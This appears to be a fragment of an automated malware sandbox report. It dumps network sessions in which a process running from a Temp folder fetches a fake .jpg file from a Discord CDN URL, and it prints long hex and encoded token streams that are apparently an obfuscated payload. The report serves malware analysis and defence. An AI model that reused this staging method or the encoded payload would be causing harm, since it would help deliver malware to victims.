                                                                                                                          2021-10-29 15:07:00 UTC2399INData Raw: 52 52 20 78 20 52 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 51 74 20 78 20 74 4b 20 78 20 4f 6f 6f 20 78 20 52 6b 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 74 20 78 20 74 6b 20 78 20 4f 78 4b 20 78 20 6b 4f 20 78 20 52 6b 20 78 20 4b 45 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 4f 4f 20 78 20 4b 74 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 78 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 4f 4f 51 20 78 20 74 4f 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 6b 78 20 78 20 52 51 20 78 20 52 51 20 78 20 74 45 20 78 20 6b 6b 20 78 20 59 78 20 78 20 4f 78 6f 20 78 20 4f 78 45 20 78 20 4b 51 20 78 20 4f 4f 4f 20 78 20 4b 6b 20 78 20 74 74 20 78 20 4f 78 4b 20 78 20 52 59 20 78 20 52 59 20 78 20
                                                                                                                          Data Ascii: RR x RY x Qx x kO x Qt x tK x Ooo x Rk x kO x RY x Rt x tk x OxK x kO x Rk x KE x Kt x Kt x Yt x OOO x Kt x OOQ x RY x RY x RY x tx x Rk x OOO x OOQ x tO x RQ x RY x RY x tE x kx x RQ x RQ x tE x kk x Yx x Oxo x OxE x KQ x OOO x Kk x tt x OxK x RY x RY x
                                                                                                                          2021-10-29 15:07:00 UTC2415INData Raw: 78 20 78 20 59 52 20 78 20 59 59 20 78 20 6b 6b 20 78 20 52 74 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 4f 78 78 20 78 20 52 52 20 78 20 52 52 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 59 52 20 78 20 51 51 20 78 20 74 45 20 78 20 74 51 20 78 20 59 52 20 78 20 51 78 20 78 20 59 52 20 78 20 59 52 20 78 20 52 6b 20 78 20 6b 78 20 78 20 52 59 20 78 20 6b 6b 20 78 20 4b 51 20 78 20 59 45 20 78 20 51 6b 20 78 20 4f 4f 51 20 78 20 4f 78 45 20 78 20 6b 4f 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 4f 78 4f 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 78 45 20 78 20 4f 6f 4f 20 78 20 6b 4f 20 78 20 52 74 20 78 20 52 59 20 78 20 74 45 20 78 20 4f 4f 59 20 78 20 74 4b 20 78 20 4f 78 45 20 78 20 59 78 20 78 20 6b 4f 20 78 20 74 45 20 78 20 52 52 20 78 20 52 59 20 78 20 52
                                                                                                                          Data Ascii: x x YR x YY x kk x Rt x kO x kO x Oxx x RR x RR x RY x OxE x YR x QQ x tE x tQ x YR x Qx x YR x YR x Rk x kx x RY x kk x KQ x YE x Qk x OOQ x OxE x kO x RY x OOQ x OxO x RY x Rk x OxE x OoO x kO x Rt x RY x tE x OOY x tK x OxE x Yx x kO x tE x RR x RY x R
                                                                                                                          2021-10-29 15:07:00 UTC2431INData Raw: 6b 20 78 20 59 74 20 78 20 52 6b 20 78 20 52 59 20 78 20 6b 59 20 78 20 6b 78 20 78 20 4f 78 4b 20 78 20 51 51 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 74 52 20 78 20 52 6b 20 78 20 6b 45 20 78 20 4f 6f 6f 20 78 20 4b 45 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 6f 6f 20 78 20 59 78 20 78 20 4f 6f 6f 20 78 20 4f 4f 6b 20 78 20 74 52 20 78 20 4f 78 78 20 78 20 52 52 20 78 20 6b 4b 20 78 20 4f 4f 4b 20 78 20 52 6b 20 78 20 52 6b 20 78 20 4f 4f 52 20 78 20 74 78 20 78 20 52 51 20 78 20 52 59 20 78 20 4b 45 20 78 20 52 51 20 78 20 4f 4f 4b 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 6b 78 20 78 20 52 52 20 78 20 52 52 20 78 20 74 45 20 78 20 4f 4f 59 20 78 20 52
                                                                                                                          Data Ascii: k x Yt x Rk x RY x kY x kx x OxK x QQ x kO x RY x RY x RY x Rt x tR x Rk x kE x Ooo x KE x kO x RY x RY x Ooo x Yx x Ooo x OOk x tR x Oxx x RR x kK x OOK x Rk x Rk x OOR x tx x RQ x RY x KE x RQ x OOK x kO x RY x RY x RY x tE x kx x RR x RR x tE x OOY x R
                                                                                                                          2021-10-29 15:07:00 UTC2447INData Raw: 20 52 59 20 78 20 6b 52 20 78 20 4f 4f 4f 20 78 20 4f 4f 6b 20 78 20 4f 6f 78 20 78 20 4f 78 45 20 78 20 59 59 20 78 20 59 59 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 4f 78 6b 20 78 20 74 4f 20 78 20 6b 78 20 78 20 74 6f 20 78 20 6b 4f 20 78 20 6b 78 20 78 20 6b 59 20 78 20 74 45 20 78 20 4f 4f 6b 20 78 20 74 4f 20 78 20 59 4b 20 78 20 74 52 20 78 20 6b 4f 20 78 20 6b 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 4f 4f 74 20 78 20 6b 4f 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 74 78 20 78 20 59 59 20 78 20 52 6b 20 78 20 4f 78 59 20 78 20 59 6f 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52
                                                                                                                          Data Ascii: RY x kR x OOO x OOk x Oox x OxE x YY x YY x Oxt x RY x OxE x RY x RY x RY x tE x Oxk x tO x kx x to x kO x kx x kY x tE x OOk x tO x YK x tR x kO x kQ x RY x RY x Rk x OOO x OOt x kO x tE x RY x RY x tx x YY x Rk x OxY x Yo x Qt x OxE x RY x OxE x RY x R
                                                                                                                          2021-10-29 15:07:00 UTC2463INData Raw: 6b 59 20 78 20 6b 78 20 78 20 4f 78 59 20 78 20 59 6f 20 78 20 59 59 20 78 20 6b 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 51 74 20 78 20 59 52 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 78 59 20 78 20 4b 6b 20 78 20 6b 4f 20 78 20 52 52 20 78 20 52 51 20 78 20 74 51 20 78 20 4f 4f 59 20 78 20 74 59 20 78 20 4b 74 20 78 20 59 4f 20 78 20 51 78 20 78 20 4f 78 45 20 78 20 4f 78 59 20 78 20 4f 6f 78 20 78 20 74 6b 20 78 20 6b 4f 20 78 20 4f 78 59 20 78 20 59 52 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 52 51 20 78 20 4f 78 6b 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4f 78 78 20 78 20 52 74 20 78 20 6b 4f 20 78 20 74 74 20 78 20 4f 78 59 20 78 20 59 52 20 78 20 51 6b 20 78 20 4f 4f 4f 20 78 20 4f 78 4f 20 78 20 4b 74 20 78 20 59
                                                                                                                          Data Ascii: kY x kx x OxY x Yo x YY x kY x RY x OxE x RY x RY x Qt x YR x RY x kY x OxY x Kk x kO x RR x RQ x tQ x OOY x tY x Kt x YO x Qx x OxE x OxY x Oox x tk x kO x OxY x YR x OOk x Kt x RQ x Oxk x Rk x Kt x Oxx x Rt x kO x tt x OxY x YR x Qk x OOO x OxO x Kt x Y
                                                                                                                          2021-10-29 15:07:00 UTC2479INData Raw: 4f 4f 4f 20 78 20 74 74 20 78 20 74 6b 20 78 20 74 4b 20 78 20 52 59 20 78 20 52 59 20 78 20 74 51 20 78 20 4f 4f 59 20 78 20 74 78 20 78 20 51 74 20 78 20 74 4f 20 78 20 4f 78 52 20 78 20 6b 45 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 4f 78 52 20 78 20 4f 4f 4f 20 78 20 51 78 20 78 20 4f 4f 6b 20 78 20 6b 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 6f 20 78 20 4f 4f 59 20 78 20 74 6f 20 78 20 4f 78 59 20 78 20 59 52 20 78 20 4b 74 20 78 20 4b 74 20 78 20 6b 59 20 78 20 52 74 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 4f 78 52 20 78 20 51 6b 20 78 20 6b 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 4b 20 78 20 74 4f 20 78 20 52 6b 20 78 20 4b 6b 20 78
                                                                                                                          Data Ascii: OOO x tt x tk x tK x RY x RY x tQ x OOY x tx x Qt x tO x OxR x kE x kO x RY x Rk x Kt x Oxx x kO x OxR x OOO x Qx x OOk x kk x Kt x Kt x Yo x OOY x to x OxY x YR x Kt x Kt x kY x Rt x ko x kO x OxR x Qk x kY x RY x Kt x OOk x Kt x Kt x YK x tO x Rk x Kk x
                                                                                                                          2021-10-29 15:07:00 UTC2495INData Raw: 20 78 20 4f 78 74 20 78 20 4f 4f 6b 20 78 20 52 52 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 4f 78 51 20 78 20 51 51 20 78 20 74 4b 20 78 20 74 52 20 78 20 4f 78 45 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 74 4b 20 78 20 4f 4f 78 20 78 20 52 74 20 78 20 6b 45 20 78 20 4f 4f 59 20 78 20 74 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 59 20 78 20 51 78 20 78 20 4f 4f 51 20 78 20 4f 78 74 20 78 20 4f 4f 59 20 78 20 52 52 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 4f 78 51 20 78 20 51 51 20 78 20 74 4b 20 78 20 74 52 20 78 20 6b 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 74 4b 20 78 20 59 45 20 78 20 51 6b 20 78 20
                                                                                                                          Data Ascii: x Oxt x OOk x RR x kO x RY x RY x tE x OxQ x QQ x tK x tR x OxE x kY x RY x RY x Rt x tK x OOx x Rt x kE x OOY x tx x RY x RY x RY x OxY x Qx x OOQ x Oxt x OOY x RR x kO x RY x RY x tE x OxQ x QQ x tK x tR x kO x kY x RY x RY x Rk x OOO x tK x YE x Qk x
                                                                                                                          2021-10-29 15:07:00 UTC2511INData Raw: 20 78 20 74 78 20 78 20 59 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 74 6f 20 78 20 6b 6f 20 78 20 4f 78 6f 20 78 20 4f 78 45 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 59 20 78 20 6b 59 20 78 20 6b 59 20 78 20 74 45 20 78 20 59 4b 20 78 20 52 6b 20 78 20 59 4f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 45 20 78 20 74 78 20 78 20 4f 4f 51 20 78 20 74 6f 20 78 20 6b 4f 20 78 20 51 74 20 78 20 51 74 20 78 20 74 45 20 78 20 4f 78 52 20 78 20 6b 51 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 6b 20 78 20 4b 74 20 78 20 74 6b 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 6b 6b 20 78 20 74 51 20 78 20 59 52 20 78 20 74 6b 20 78 20 4b 6b 20 78 20 52
                                                                                                                          Data Ascii: x tx x YY x RY x RQ x RY x RY x RY x Rk x to x ko x Oxo x OxE x Rt x RY x RY x RY x RY x OxY x kY x kY x tE x YK x Rk x YO x Kt x Kt x Kt x KE x tx x OOQ x to x kO x Qt x Qt x tE x OxR x kQ x kO x RY x Rk x Kt x tk x OOk x Kt x kk x tQ x YR x tk x Kk x R
                                                                                                                          2021-10-29 15:07:00 UTC2527INData Raw: 78 20 4f 6f 6f 20 78 20 51 74 20 78 20 74 4b 20 78 20 6b 6f 20 78 20 4f 78 45 20 78 20 4f 78 52 20 78 20 4b 74 20 78 20 4b 51 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 59 6f 20 78 20 59 78 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 4f 6f 6f 20 78 20 51 74 20 78 20 74 4b 20 78 20 6b 6f 20 78 20 4f 78 4b 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4b 51 20 78 20 59 78 20 78 20 4f 78 59 20 78 20 74 45 20 78 20 59 78 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 4f 6f 6f 20 78 20 51 74 20 78 20 74 4b 20 78 20 6b 6f 20 78 20 4f 78 4b 20 78 20 6b 4b 20 78 20 4b 74 20 78 20 4b 51 20 78 20 59 6f 20 78 20 4f 78 6b 20 78 20 74 4f 20 78 20 52 6b 20 78 20 74 78 20 78 20 4b 74 20 78 20 52 6b 20 78 20 6b 52 20 78 20 6b 51 20
                                                                                                                          Data Ascii: x Ooo x Qt x tK x ko x OxE x OxR x Kt x KQ x Yx x OxK x Yo x Yx x kY x RY x RY x Kt x Ooo x Qt x tK x ko x OxK x Rk x Kt x KQ x Yx x OxY x tE x Yx x kY x RY x RY x Kt x Ooo x Qt x tK x ko x OxK x kK x Kt x KQ x Yo x Oxk x tO x Rk x tx x Kt x Rk x kR x kQ
                                                                                                                          2021-10-29 15:07:00 UTC2543INData Raw: 4b 20 78 20 51 6b 20 78 20 4f 6f 6f 20 78 20 4b 45 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 6b 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 4f 6f 78 20 78 20 6b 6b 20 78 20 4f 4f 51 20 78 20 4f 4f 51 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 59 59 20 78 20 59 4f 20 78 20 52 59 20 78 20 4b 74 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 52 52 20 78 20 4f 4f 78 20 78 20 74 4b 20 78 20 4b 45 20 78 20 59 4b 20 78 20 52 51 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 45 20 78 20 74 52 20 78 20 6b 6b 20 78 20 4f 78 45 20 78 20 6b 4f 20 78 20 4f 6f 6f 20 78 20 4b 6b 20 78 20 4f 78 52 20 78 20 6b 78 20 78 20 52 59 20 78 20 74 51 20 78 20
                                                                                                                          Data Ascii: K x Qk x Ooo x KE x Kt x Kt x YR x kY x RY x kO x RY x RY x Kt x Oox x kk x OOQ x OOQ x RQ x RY x RY x OxE x YY x YO x RY x Kt x OOk x Kt x Kt x RR x OOx x tK x KE x YK x RQ x OOk x Kt x Kt x Kt x KE x tR x kk x OxE x kO x Ooo x Kk x OxR x kx x RY x tQ x
                                                                                                                          2021-10-29 15:07:00 UTC2559INData Raw: 78 20 59 52 20 78 20 6b 51 20 78 20 4f 78 6b 20 78 20 4b 51 20 78 20 4b 45 20 78 20 74 6f 20 78 20 6b 52 20 78 20 4f 78 4f 20 78 20 6b 52 20 78 20 59 78 20 78 20 4f 4f 4f 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4f 6f 78 20 78 20 6b 6b 20 78 20 4b 6b 20 78 20 4f 4f 51 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 74 20 78 20 59 74 20 78 20 4f 4f 52 20 78 20 52 6b 20 78 20 6b 59 20 78 20 4b 51 20 78 20 74 74 20 78 20 4f 6f 6f 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 51 74 20 78 20 4f 78 51 20 78 20 6b 74 20 78 20 74 4b 20 78 20 6b 6f 20 78 20 4f 78 6f 20 78 20 4f 6f 4f 20 78 20 52 52 20 78 20 4f 6f 78 20 78 20 4f 4f 78 20 78 20 4f 78 45 20 78 20 52 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 4f 20 78
                                                                                                                          Data Ascii: x YR x kQ x Oxk x KQ x KE x to x kR x OxO x kR x Yx x OOO x Rk x Kt x Oox x kk x Kk x OOQ x kY x RY x RY x tt x Yt x OOR x Rk x kY x KQ x tt x Ooo x Kt x KQ x Oxx x kk x Qt x OxQ x kt x tK x ko x Oxo x OoO x RR x Oox x OOx x OxE x Rk x RY x RY x RR x kO x
                                                                                                                          2021-10-29 15:07:00 UTC2575INData Raw: 20 78 20 4f 78 74 20 78 20 4f 78 59 20 78 20 6b 45 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 59 20 78 20 4b 6b 20 78 20 6b 4f 20 78 20 4f 78 74 20 78 20 52 51 20 78 20 74 45 20 78 20 4f 78 6b 20 78 20 4f 4f 59 20 78 20 74 4b 20 78 20 52 52 20 78 20 52 74 20 78 20 74 6b 20 78 20 51 6b 20 78 20 52 74 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 74 59 20 78 20 4b 45 20 78 20 52 52 20 78 20 6b 4b 20 78 20 6b 52 20 78 20 4f 78 6b 20 78 20 4f 78 4f 20 78 20 74 52 20 78 20 6b 6f 20 78 20 4f 78 6f 20 78 20 4f 78 59 20 78 20 74 4b 20 78 20 51 78 20 78 20 4f 78 4f 20 78 20 4f 78 4b 20 78 20 6b 4f 20 78 20 4f 78 59 20 78 20 4b 6b 20 78 20 6b 6b 20 78 20 59 52 20 78 20 4f 6f 78 20 78 20 4b 6b 20 78 20 6b 6b 20
                                                                                                                          Data Ascii: x Oxt x OxY x kE x kY x RY x RY x RY x RY x RY x OxY x Kk x kO x Oxt x RQ x tE x Oxk x OOY x tK x RR x Rt x tk x Qk x Rt x kO x kO x tY x KE x RR x kK x kR x Oxk x OxO x tR x ko x Oxo x OxY x tK x Qx x OxO x OxK x kO x OxY x Kk x kk x YR x Oox x Kk x kk
                                                                                                                          2021-10-29 15:07:00 UTC2591INData Raw: 78 20 52 59 20 78 20 74 4f 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 52 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 6b 4b 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 4f 78 4f 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 45 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 52 52 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 45 20 78 20 52 59 20
                                                                                                                          Data Ascii: x RY x tO x Oxt x RY x Qk x OxE x RR x Oxt x RY x tO x YR x RY x Oxx x OOQ x RR x kK x RY x tO x Oxt x RY x OxO x OxE x RR x Oxk x RY x RY x RY x RY x RY x RY x RR x kE x RY x to x kY x RY x Qk x OxE x RR x RR x RY x to x tt x RY x RY x RY x RR x kE x RY
                                                                                                                          2021-10-29 15:07:00 UTC2607INData Raw: 4f 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 51 51 20 78 20 52 59 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4f 78 4b 20 78 20 52 59 20 78 20 74 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 78 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 59 52 20 78 20 52 59 20 78 20 74 4f 20 78 20 74 45 20 78 20 52 59 20 78 20 6b 78 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 74 20 78 20 52 59 20 78 20 6b 78 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 74 45 20 78 20 52 59 20 78 20 6b 78 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 59 52 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 51 78 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59
                                                                                                                          Data Ascii: Ok x RY x to x QQ x RY x QQ x OxE x RR x OxK x RY x to x RY x RY x kx x OxE x RY x YR x RY x tO x tE x RY x kx x OxE x RY x Oxk x RY x to x tt x RY x kx x RY x RY x OOk x RY x tO x tE x RY x kx x OxE x RY x YR x RY x to x kO x RY x Qx x RY x RY x OxE x RY
                                                                                                                          2021-10-29 15:07:00 UTC2623INData Raw: 6b 4b 20 78 20 51 74 20 78 20 6b 74 20 78 20 6b 6f 20 78 20 6b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 59 4f 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 6b 52 20 78 20 74 4f 20 78 20 59 74 20 78 20 4f 4f 6b 20 78 20 51 6b 20 78 20 74 4f 20 78 20 4f 78 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 74 6f 20 78 20 52 59 20 78 20 4f 6f 6f 20 78 20 74 74 20 78 20 4f 78 6b 20 78 20 74 6b 20 78 20 4f 4f 74 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 51 74 20 78 20 74 4f 20 78 20 59 74 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 4b 51 20 78 20 4f 4f 6b 20 78 20
                                                                                                                          Data Ascii: kK x Qt x kt x ko x kk x RY x RY x RY x RY x kO x YO x tK x Oxk x kQ x kk x ko x Oxk x kR x tO x Yt x OOk x Qk x tO x OxK x Oxk x Qk x to x RY x Ooo x tt x Oxk x tk x OOt x kQ x kk x RR x Ooo x Qt x tO x Yt x Kk x RY x RY x RY x RY x RY x RQ x KQ x OOk x
                                                                                                                          2021-10-29 15:07:00 UTC2639INData Raw: 20 78 20 52 59 20 78 20 52 6b 20 78 20 6b 51 20 78 20 59 6f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 6f 6f 20 78 20 74 51 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 74 74 20 78 20 74 52 20 78 20 4f 78 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 59 6f 20 78 20 59 6f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 4b 20 78 20 4f 4f 74 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 74 59 20 78 20 6b 4b 20 78 20 4f 78 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 51 74 20 78 20 59 6f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 52 20 78 20 4f 4f 74 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 51 6b 20 78 20 4f 78 59 20 78 20 52 59 20 78 20 52
                                                                                                                          Data Ascii: x RY x Rk x kQ x Yo x OxE x RY x RY x Ooo x tQ x tE x RY x RY x tt x tR x OxY x RY x RY x Rt x Yo x Yo x OxE x RY x RY x OOK x OOt x tE x RY x RY x tY x kK x OxY x RY x RY x Rt x Qt x Yo x OxE x RY x RY x OxR x OOt x tE x RY x RY x tE x Qk x OxY x RY x R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          5192.168.2.749837162.159.134.233443C:\Users\user\AppData\Local\Temp\3113.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2021-10-29 15:07:02 UTC2645OUTGET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1
                                                                                                                          Host: cdn.discordapp.com
                                                                                                                          2021-10-29 15:07:02 UTC2645INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:02 GMT
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 345655
                                                                                                                          Connection: close
                                                                                                                          CF-Ray: 6a5d4faaeebe4e7a-FRA
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Age: 75606
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          ETag: "d05714d4497c7b55b2c0b1609cbd62c9"
                                                                                                                          Expires: Sat, 29 Oct 2022 15:07:02 GMT
                                                                                                                          Last-Modified: Tue, 26 Oct 2021 11:56:34 GMT
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                          Cf-Bgj: h2pri
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          x-goog-generation: 1635249394465681
                                                                                                                          x-goog-hash: crc32c=to49mQ==
                                                                                                                          x-goog-hash: md5=0FcU1El8e1WywLFgnL1iyQ==
                                                                                                                          x-goog-metageneration: 1
                                                                                                                          x-goog-storage-class: STANDARD
                                                                                                                          x-goog-stored-content-encoding: identity
                                                                                                                          x-goog-stored-content-length: 345655
                                                                                                                          X-GUploader-UploadID: ADPycds4sIyz_GzjIugLy9_WqK029_2RU2KSIIfGlpMQJZx1WvXGDydhZDvUpsH4QNomt1ATbnkYUYcRxSnB_xGGebc
                                                                                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qVvvoJ3L44rxDFk8DwZ3iXeJs6md4ZPX88kdjmqsW%2F7la%2ByzdR2K%2BMvsXNGcEUSx5B%2BtKZWomRbgDOkyBpr9xUwk%2FmqrQ2sHUaw0pzHFqRXJO9cFzEzS7EM4GQp0flT5bL5aDg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          2021-10-29 15:07:02 UTC2646INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                          Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                          2021-10-29 15:07:02 UTC2646INData Raw: 78 20 52 51 20 78 20 74 6b 20 78 20 4f 6f 4f 20 78 20 51 78 20 78 20 6b 74 20 78 20 74 78 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 52 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 51 6b 20 78 20 59 78 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 51 51 20 78 20 59 4f 20 78 20 74 6b 20 78 20 6b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 51 20 78 20 74 6b 20 78 20 4f 4f 59 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 6b 45 20 78 20 74 4f 20 78 20 74 78 20 78 20 4f 4f 74 20 78 20 51 78 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 4f 20 78 20 52 6b 20 78 20 6b 59 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 6f 20 78 20 6b 74 20 78 20
                                                                                                                          Data Ascii: x RQ x tk x OoO x Qx x kt x tx x Kk x Qx x kR x RR x OoO x Qk x Yx x tk x Oxk x QQ x YO x tk x kk x RY x RY x RY x Kk x RY x RQ x tk x OOY x Qk x YO x tk x Oxk x kE x tO x tx x OOt x Qx x tO x Oox x Oxk x RY x RR x kO x Rk x kY x Yx x kR x Kk x ko x kt x
